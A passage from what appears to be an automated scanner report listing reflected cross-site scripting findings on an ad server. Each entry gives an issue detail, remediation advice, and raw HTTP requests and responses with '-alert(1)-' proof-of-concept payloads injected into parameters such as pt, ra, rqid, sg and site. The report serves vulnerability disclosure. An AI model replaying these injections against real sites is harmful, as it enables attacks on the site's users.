HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
02562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=9df1a'-alert(1)-'d8d0b082069&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.152. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b300"-alert(1)-"46531bd7138 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=83016b300"-alert(1)-"46531bd7138&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
50%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=83016b300"-alert(1)-"46531bd7138&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&
...[SNIP]...

3.153. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfcb1'-alert(1)-'a9d20cd76d8 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301cfcb1'-alert(1)-'a9d20cd76d8&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
50%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301cfcb1'-alert(1)-'a9d20cd76d8&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&
...[SNIP]...

3.154. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ra parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4c9c'-alert(1)-'3c148c4423f was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243a4c9c'-alert(1)-'3c148c4423f&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243a4c9c'-alert(1)-'3c148c4423f&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.155. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ra parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0530"-alert(1)-"a006e1efd34 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243d0530"-alert(1)-"a006e1efd34&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243d0530"-alert(1)-"a006e1efd34&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_1303848426617.uniqueId;

...[SNIP]...

3.156. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [rqid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10e91'-alert(1)-'f91892f526a was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D710e91'-alert(1)-'f91892f526a&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D710e91'-alert(1)-'f91892f526a&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.157. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [rqid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bae93"-alert(1)-"c1a656bef97 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7bae93"-alert(1)-"c1a656bef97&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7bae93"-alert(1)-"c1a656bef97&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";

...[SNIP]...

3.158. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2aa53'-alert(1)-'20a1eda3f6c was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=5025622aa53'-alert(1)-'20a1eda3f6c&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/182/%2a/b%3B238347919%3B0-0%3B0%3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=5025622aa53'-alert(1)-'20a1eda3f6c&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom
...[SNIP]...

3.159. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41489"-alert(1)-"2cc112ad18b was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=50256241489"-alert(1)-"2cc112ad18b&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/182/%2a/b%3B238347919%3B0-0%3B0%3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=50256241489"-alert(1)-"2cc112ad18b&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom
...[SNIP]...

3.160. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59eb9'-alert(1)-'a7fc128b15f was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=359eb9'-alert(1)-'a7fc128b15f&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
07-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=359eb9'-alert(1)-'a7fc128b15f&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5N
...[SNIP]...

3.161. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56db1"-alert(1)-"f50fc3f5031 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

